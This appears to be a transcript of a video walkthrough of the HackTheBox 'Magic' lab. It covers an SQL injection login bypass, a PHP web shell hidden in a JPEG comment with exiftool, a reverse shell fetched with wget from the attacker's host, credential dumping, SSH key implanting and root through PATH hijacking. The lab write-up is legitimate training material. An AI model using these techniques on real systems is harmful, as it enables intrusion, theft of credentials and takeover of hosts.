Welcome back. Happy Saturday. It's Justin with Parity InfoSec again. Today we're going to take a look at the medium box magic from HackTheBox. This one was a tricky one in some areas, but it's a relatively straightforward box. There's going to be a basic SQLi login bypass at the beginning. We'll take a look at a page, bypass the login. It'll get us to an upload page, at which point there's a file upload restriction bypass that you need to perform in order to get a PHP shell. We'll look at a couple different ways that I went about that, and then finally talk about how exiftool was able to get us there. With the embedded image PHP, you'll be able to get a web shell from www.data and then finalize that into a more firm shell. We'll go ahead and get the second user via a little bit of database magic. So there's some AWA-ish type PHP scripting. We'll take a look at the login script and modify it to our purposes. There's also a bonus that I found out after the fact. There was MySQL dump in order to dump the database. But either way, we're going to try and dump the database to get the user credentials. That way we can log in, implant some authorized keys, and get an SSH. With that SSH, we'll have a firm terminal to try and start doing enumeration on one process that is being run by root. And there's two ways that we go about the enumeration. Initially, I did it through pspy. Just by doing some strings, we'll go ahead and do a basic enumeration about the executable, run it a few times, figure out what it's doing, and then we're going to use a path hijacking attack in order to insert our own executable and get it to run what we're looking for. We're going to use the basic tools, browser, burp, exiftool, like I said. We're going to use a netcat for one portion towards the end, as well as to get our shell before we get our SSH in place. Linpeas for a little bit of enumeration on the overall box, and then by bonus, they're not required, but we'll talk about MySQL dump and pspy. So with that, let's get started. All right, as always, we'll start with an Nmap. So Nmap 10.10.10.185 for this box. We'll T5 speed it up, VV because I want to see what's going on, and we'll just leave normal ports on. I know what we're expecting, and that's what we got, 80 and 22. So we're going to have some SSH capabilities later on, but a lot of this is going to be enumeration on 80. So let's just go to the first site and take a look. So when this site loads up, you're going to get a magic portfolio. There's a bunch of images here. It's kind of interesting. This was a rabbit hole I fell into a little bit. So if you look at page source, which is the first place I normally look, there is a weird set of characters. I tried all kinds of decrypting, decoding, whatever's going on there. I don't know what it was. I never got there. If somebody else knows, please let me know. But for the most part, not important. They didn't need it. You start to see some of these image sources. So images full. So that's a directory we can look at a little bit later. And as you keep coming down, images, there's one here, you start to see images / uploads / magic hat _ number. The other way that I took a look at this was just doing a view image info, and it'll load all the images up here, and you'll start to see, okay, here's the different images. And so there's a couple different folders, and I think that uploads folder is going to be pretty interesting here in a minute. So let's take a look at more of the page. There wasn't a whole lot over here, but you can kind of see that there is a login, and it is sitting down here in the bottom left, just using your eyeballs. So click the login. I got a user login page. All right, so we'll try admin. Nope. All right. Let's say admin. Password. Okay, I really hate Hydra, Potato, some of the other kind of brute force, but there is one thing I use Burp for quite often, and that's a basic SQLi check. It's not deep, it's not intensive, but I'll use the intruder. I use the intruder, so we'll do a Control-I, send it to intruder, Control-Shift-I takes it there. And then we start looking at the positions. I want to clear all the positions out because I really just want to play with the password. You can play with the password, you can play with the username. But for right now, we'll just say add. So it adds, that's going to be the one field that we mess around with. And then when you come over here, you've got a simple list. And then I like to load, I have a word list that I made. So there's 2 word lists. So if you go to user share, I made this one. Word list. I made one called new SQLi, and I made one called SQLi. The new is a little bit funky. We'll clear that. We'll load the SQLi. This is a lot of those basic checks. So 1 tick or 1 equals 1 dash dash, pound, you know, the different, depending on if you're using MySQLi or depending on whether you're using SQL, either Microsoft SQL or MySQL, whatever format you're using. There's single quotes, there's double quotes. There's a variety of different things here. So this is a basic. There is that SQL list that I showed earlier. That was a part of the sec lists. But I'm going to go ahead and stick with this list because I like it. It's just a basic one that I made and I know what's in it. So we've got all that in there. We're going to go ahead and say run, start attack. Because I'm not using a pro version, it's going to be throttled. This is what you should expect. Still fairly fast for a small number. What I usually look at is this, the length, to try and see what the differences are. But there's also an interesting one with this one where you've got a status 200, but then there's this 302 message down here. So 302 is a redirect, and if you look down into this response, 302 found, location, it's redirecting me to upload.php. So that one is a valid SQL injection saying if you use tac or 1 equals 1 pound, that is considered a valid one. If you run that word list that I originally popped up, that one has a ton that come out as positives on this one, but this is kind of a basic one for me. I like it. So I'm going to take this and I'm actually going to use this on the browser. Just straight up say admin, and then I'll paste that in. Now we'll save. So update that information and we don't have to worry about it anymore. So all we have now is an option to log out. We have an option to add an image. So let's go ahead and I have one for HackTheBox, hack JPEG. It's the normal symbol. I click upload and it goes straight through. File hack has been uploaded, but we don't necessarily know where. I'm going to use the information that we got back from this page. We'll go back to this main page and say view image info. So images / uploads / name. So we'll just go ahead and try that. So images / uploads / hack.jpg. And there it is. All right, so we know that we're getting positive upload. Let's go ahead and upload a PHP. So we'll do command.php. All right, not gonna work. Sorry, only JPG, JPEG, and ping are allowed. All right. So if you look at Hadoop group, they have a nice little demo on how you can do these bypasses. The first one is just upload that PHP. Doesn't work, so let's try and change the information in Burp. So I'll set my proxy. Let's close this out. We'll close this out. And we'll go to proxy intercept. So I just want to grab it and I want to try and intercept it in between and see if I can mess with it. So command.php, upload. We'll send it to the repeater. That way we can try a few different things. So first thing, it says the name is image. File name is command.php, and then content is PHP. So I'm going to change this to image JPEG and see what happens. Sorry, only those are allowed. Okay, so we'll try and change this to a JPEG. Comes back and says, what are you trying to do here? It knows that we're trying to mess around. That's not good. And if I say, come on, php.jpg, should come back with the same exact error. what are you trying to do there? Like, you're trying to mess around, you're trying to do some squirrely things. It knows that the content type is JPEG, the file name is JPEG, the name is JPEG, but this is not a JPEG. So it's doing a little bit of file verification. And we know that when we pushed an actual JPEG up, it worked. So the next easiest one is to use exiftool. So we'll go back to our terminal. So when I try to do exiftool, I'd like to bring everything over into that file folder that I'm using. So we'll go ahead and copy over var www.html, and we're going to say hack.jpg, and we want to put it here in this folder. We'll do the same thing with var www.html. I have a command.php that I use. I'm going to put that here. And this is what that command looks like. And this is that system get command that we're going to use when we try to do parameterized queries back to the PHP to try and get that remote code execution. In order to do that, we're going to inject that field and a little bit extra into the comment block with exiftool. So exiftool comment equals, and at this point we'll go ahead and use a little bit of PHP in order to echo out a pre-statement for the HTML. Make it look nice. And then I will pull over this system get command, and we'll go all the way out to the end of the line, because that's really what I want to see. Is I want to say PHP, we're going to echo system get command, close it out, do a single quote, and then we're going to inject it into the file hack.jpg. When you do lslia, you're going to see that hack.jpg is slightly bigger than hack.jpg original, so it backs it up, and then it makes that new file with the information embedded into the comment. So we're going to go ahead and do one last thing, which is move hack.jpg into hack.php.jpg so that the browser knows to interpret it as PHP when it sees that comment. So with that done, we'll come back over here and we'll say upload this, open, upload, and it has been uploaded. So if we come over to here and we just say hack php.jpg, you're going to see that it's processing that PHP. That's awesome. It's just what we want to see. And then we'll just do a question mark CMD. If you're not familiar, this is just how PHP, when it brings in that parameter of command, it's going to run it. So who am I? Dub data. Okay, we can do the same thing if I just say current working directory and then if config. So we're sitting in var www magic. Okay, that's what we're going to see, not HTML, but magic images uploads. So I can come back over to my terminal. Let me bring over, I have Pentest Monkeys reverse shell. It's really cool. So we'll do var www HTML PHP reverse shell PHP. We'll put it right here. And let's just make sure that it is the parameters for what we need. We'll start with IP address, and we're sitting at 10.10.10.14.25. So nano PHP reverse shell. And you're gonna see it's 10.10.10.14.25, so that's good. And then our reverse shell is gonna come on 4.4.3. So I need to set this up to catch the shell. So nc mvlp 4.4.3. We're gonna have to do that sudo. Put in the password, and then we will do a wget. Let's make sure it's got it. So which wget? Oh, so this is one of the challenges you're going to have, is that it's going to delete that file. The files in upload get deleted quite frequently. You just got to come back in here and upload it again. So PHP JPEG, upload, come back over here, refresh screen, and it'll run that command. There's a wget. I hate this. It's going to keep deleting it on us. So we need to make sure to get that shell in there. But we don't want it in this folder because this folder tends to be problematic. Now we determine based on the working directory that it's in var www.magic images uploads. So we want to back it up 2 folders and get it to var www.magic so it stays within the root. So we'll do a wget. We'll say 10.10.10 14.25, and we're going to say php reverse shell.php, and then we're going to do an output file, and we're going to say backup to, because I don't want it I don't want it in uploads, I don't want it in images, I want it in the main root. And we'll just say shell.php. To do that, we'll need to cd http magic, and then I'll do a python 3 http.server on port 80. Python, and it's going to ask us in a second for sudo anyway, so all right, we got that going. We will run this command. You see that it pulled php reverse shell, so I missed the extra dash. Give it a 404. That time I got it. This time I got a 200. It pulled it over. We got that shell waiting. So now we can just say shell .php. And it's running, so that's good. All right, so there we've got our shell, www data, awesome. Let's look at our working directory. We're actually in root, so we will cd var www magic. And there's our file, so lslia. You're gonna see the shell that we put in here. You're gonna see that upload, log out, log in, and then there's also this db php5. If we look at the login, cat login.php, this is going to be the file that we process when you first try to access the website. And it's going to come in here, it's going to start a session, then it's going to require db.php5. We'll take a look at that in a minute. And then it's going to look for the username value and the password posted to this file. So you're going to send a post request to this file with the username and password. And then it'll try and run some of this code execution. So it's going to connect to the database. And then it's going to do a query. Select everything from login. So table login. And then you're going to look for username and password. So you're going to look for the username and password in the login, hopefully get something back. That'll be stored in statement into user. And then for each user as value, add count +1. So if this information is valid, if you give a valid username and password, it's going to call it count equals 1. If count is greater than 0, saying that it did exist in the database, you're going to say cool, session user ID, and send the location upload.php header. If not, if they weren't in the database, you're going to say wrong username and password, send them about their way. And this is all the code that goes along with processing a get versus a post. This file right here is where I say there's a little bit of an AWAE application here. You can use this. It's not super difficult for the offensive security web exploitation side of the house, but it is a nice handy little thing to practice some PHP coding as well as understanding how SQL works and how you can modify it to write the code that you want it to do. So we're going to go ahead and pull this down and we're going to do what we want to do with it. One of the challenges I found with this box, if you are not using an upgraded shell, it will not work between wgets and setting information places. This needs to be an upgraded shell in order to get code execution. Really boggled my mind for quite a while. So now that's said, let's go ahead and upgrade this shell. And I'll just do a Python. We'll say which Python. There's no Python. So which Python 3? All right, so that's part of why I've been practicing Python 3. You're starting to see that boxes don't have Python. They do have Python 3. So we'll do a Python 3. And then we'll run import pty.spawn bin bash. And that should be able to, close. Bash. And that gets us an upgraded shell. All right. Now I want to be able to pull this down, take it back to my computer, modify it, and bring it back. The easiest way for me to do that is by running a PHP web server in order to get that information out without having it processed as a PHP, which would happen if you could do a wget on just this file alone. So we'll do a Python 3, since we know it's there, http.server on 8001. Good. We'll go back to our box. I'm going to leave that running. I'll open another one. So we'll do cd htb magic. Take a look. That's what we got. So we're going to do a wget 10.10.10.185. Let's say 8001, and we'll say give me that login PHP. So we got it. Now with login PHP, it did do a require of db5, db PHP 5. Had to kill that one, so we'll just load it back up here. Nice. Magic. So as you see, there's a db.php5, so we'll do a cat db.php5. And it's the database credentials. So Theseus, I am King Theseus. All right, let's see what happens if we do SSH Theseus at 10.10.10.185. Permission denied. Public key. So public key is required. You're not going to be able to do this without a public key. You have to be in authorized keys. You have to have the public key for Theseus. It's not going to allow password login, and that's something set into the configuration. With that, all right, let's try sudo Theseus. Must be run from a terminal. So again, I killed that last terminal. I got to upgrade again. So we'll just do Python 3 c import pty.spawn bin bash. Looks good. Sudo Theseus. Ooh, that's not right. Theseus. Password. I am King Theseus. That's not right either. I am King Theseus. So even with the right password, it's coming back no. So that is not the right password, but it is the right database password. So let's take a look at that database information. So we'll go to login.php. So in this, I told you we'll do a session start, require db.php5. It's going to use those credentials that we just found. It's going to see if post username is provided. If it isn't, you're out. But if it has been, it's going to look for the username, look for the password. It's going to check those against sleep and benchmark, and then it's going to try to connect and then select everything from login where username and password match. So if the username and password are found in the login table, it's going to come back with a user, and then for each user as value, so every time that it does find a user, it's going to say count equals +1 and then disconnect. If the count is greater than 1, so it was found at least once in there, then it's going to provide that session ID. It's going to provide a header of location upload.php. Otherwise, wrong username, wrong password. All that being said, I don't want to see any of that, because really we've got the credentials. Now we've got the ability to add any SQL query we want in that section right there. So let's get rid of all the HTML. There's a lot of it. And then I want to get rid of all this logic because I just don't care. I don't care if the username is there. I don't care if the password's there. I want to use the credentials I have. So let's connect. We're going to do these couple functions. This will be the statement we use. We will fetch. I don't care about the count because I'm not going to try and see if anything's there. But I'm going to try and do something here. Back this up. Disconnect the database. And again, I don't care if it's right or wrong credentials. We'll back up. We'll do a catch. We'll leave those there just for the sake of it, and really don't need those 2 lines. But what I do have here is I need to say what I want. So we're going to just do a print. Will be super simple. Print the value. Close that out. Brackets. Done. Now in order to do that, I don't want to look for a username and password. I'm not going to provide it. I just want to say select everything from login, dump everything from login, and I want to print those values into this page. That is it. This is super simple, but it's taking something that was already created and paring it down to what we understand and what we know about the database. So I will save it, but I'll save it as a different name because I want to kind of leave this off to the side without messing with any of the rest of the database. Say yes, I want to save it as a different name. So I'm still running my PHP server. I'll come over here and do a wget 10.10.14.25, and we will say pull down exploit.php. Cool. With exploit.php, let's see what happens if we run it in our browser. 1. Admin Theseus was king. Doesn't care if it's a get, doesn't care if it's a post, doesn't care what the username or password I gave it. I went ahead and just said pull everything out. So our admin and our credential, Theseus was king. Well, that looks like a pretty handy password. Let's try and use that over here. SSH. We know we can't SSH. What if we try to go back here and do a sudo? Theseus. And then we will pull this. Just make sure we copy that. Theseus was king. No. That can't be right. I think there's a little bit of a space issue here. Yeah, you see there was additional little space right there that wasn't down here. Not sure why, but now we are User Theseus. So cd home, let's make sure. Yep, he's got a directory. Cat user.txt. Ooh, that is ugly. And we got user. Good job. With that, I want to get a little bit more stable. We know that we can use a public key. So let's see what's in the SSH. So cd.ssh. Nothing. All right, let's try and echo our own credentials in there. So I'll do a cat home SSH ID pub. So here's my public key. I will copy this and we'll come back over to here. Echo, single quote, paste, single quote. And we're going to put this into authorized CED _keys, and it's stored. Now, if we say SSH Theseus, I'm going to say tech I, and we're going to use our public key. It's going to ask, here's my password for that key. And we're SSH'd in now. So a little bit better shell. We do have user. We've gotten that information. Let's see what else we can get. All right. We need to start with our enumeration. So I like to put it into cd dev shm. And I need to change my server. My little HTTP server, I'll go to var html, and I'll run that same script. And now we can do wget 10, 10, 14, 25 linpeas. Linpeas is my go-to. And we'll make sure that that's executable. I got my tab autocomplete. I'm very happy. So let's do a linpeas. Love the colors, love the font. Right out of the gates, we can kind of see that user and groups. So I'm part of Theseus. Group is this. I'm part of Group Theseus, but I'm also part of Group 100 users. Okay, that's a little bit different. Let's see what we get. When we look at root, there's nothing super interesting running as root. SSH, Apache. We look at data, that's all the craziness going on. HTTP servers, things like that. Other folks are on the box. Here's our path. We can see that it's 10.10.10.185. It's its own one IP, nothing crazy. Don't see anything that supports a Docker question. There is 3306, the MySQL. Again, like I said, when it's talking about privilege escalations, it is saying that there's an extra, hey, users group. And we just keep on moving down. Just do a quick scan of all the applications that are available. These are all pretty standard. Nothing sticks out. Same thing with this. Keep moving on. What's writable? There's something here in red. Readable files belonging to root and readable by me, but not world readable. Okay, so root users. So group is my group. Even though root has ownership of it, I have the ability to read and execute sysinfo. All right. Bin sysinfo. Let's see what that gets us. Let's see HTML magic. We do see, if you take a quick look, I am King Theseus comes up in here a couple times, but again, that was just for the database. So you're going to see that obviously in DB PHP 5. No other passwords. That King Theseus password that we used to do the swap over to Theseus didn't work. So let's see what happens if I type sysinfo. Okay, it does a little hardware info, does some memory stuff, some disk stuff. What is that? Well, there's two ways to take a look at this, and this is where you get into the executable enumeration. So a really basic way, honestly, strings, sysinfo. Strings just takes a, so this was which sysinfo. So strings bin sysinfo. We're going to take a look at all the little strings. Now, this is not breaking down an application. This is not doing reverse engineering. This is the basics. So this is just to see what you might glean from the context of information that's in there. Set UID, popen fgets, pclose. Okay, here's those headers we were looking at, hardware info. And it looks like it runs lshw short, and then it says disk info, and then it runs an fdisk. CPU info, and it says cat the proc CPU information, mem usage, free.h. So this looks like the application is really just like a shell script almost. So it's going to run these 4 applications. You can see the same thing if you say wget 10, 10, 14, 25, and we say give me pspy 64. Oh, that's not the right IP, is it? So we got pspy 64. We'll chmod it, then we'll run it. As we let it come up and run, you see all the applications that are running in the background, some shells that are popped. And you can see the MySQL is running, the Apache is running. Okay, let's see what else is going on. Let's see if we can generate it. So let's SSH. We'll do the same kind of thing. Theseus at 10, 10, 10, 185. Do a sysinfo. If we come back, we will now see that this ran sysinfo, and then it ran lshw short fdisk, and then it ran shell with a command of fdisk, shell, command of cat proc CPU info, shell free. So this is what it's doing. When you run sysinfo, it's running all these. And so that's where pspy can be handy, but you found that already through using strings. So we'll go ahead and cancel this. This has run its course. We're sitting in dev shm. Now you notice that these aren't full commands. It's not saying bin free, bin fdisk. It's saying free. So what can we do with that? Let's try and make some scripts, and what we're going to try is to do export path and hijack that path. So export path equals dev shm colon, and then we'll say all the other paths, because we don't want to break anything. We just want to inject ours first, so that dev shm is the first place you look for when you're running an executable. If it's found there, then it'll run that executable. So echo hi. Super basic. And then we will cat that to free here. So if we say sys info, it's going to run all the applications, still run mem. That's kind of weird. Chmod plus x free. Hi. So that time it ran. It sees that there's an executable called free sitting in this directory, so it runs. Awesome. What can you do with that? There are a lot of things that I've tried. There are quite a few issues when trying to use sticky bits, setting the UID to 0 for bash, but the easiest thing you can try and do is just do a reverse shell. Well, Honestly, the easiest thing you can do is say echo, and then echo, let's say cat root.txt. Close that out, put that in free. Let's make sure free is still considered an executable. So we'll do sysinfo and let it run. And there is the root.txt. All right. So that is honestly the easiest way, but I really do like to get a shell. So let's see what we can do with that. We do have a shell sitting somewhere else, sitting in the magic directory. Maybe we can try and run that. So let's say echo PHP var www magic shell.php free. We used all these up, so we'll clean that up. nc mdlp 443 sudo bang bang, and then we'll just come over here and say sysinfo php. Notice didn't find the variable, so there's my shell right there. So I see UID is root. All this is good. I am member Theseus. So who am I? I'm root. Yay! cd root ls cat root.txt. My fingers are going faster than my brain. And there we go. So we were able to use that same shell from Pentest Monkey, flip it around, and use it to go from Theseus to root, user to root, and get that shell. Got a lot of good information in this video, some quick tips. Definitely take a look at how to do the parameterized queries. This one was a little bit of a tweak, but it's something that you will see in AWAE, the Offensive Security Web Exploitation class. And it's something that you can take advantage of on some of these boxes when you get a chance. I haven't had a chance. 2020.3 Kali version with the Z shell came out this week. Hopefully I'll get an opportunity to bring that down, get tools loaded on it, and run that for the next video. But I really do hope you enjoyed it. I want to thank TRX, maker of this box. It was a fun box, medium, very tricky. But there's always a couple folks out there on Discord. If you're on Discord, take a look, find me, find some others, ask for help. All right. If you have any questions, feel free to mention them below. Please subscribe, tell some folks, and I'll see you next week.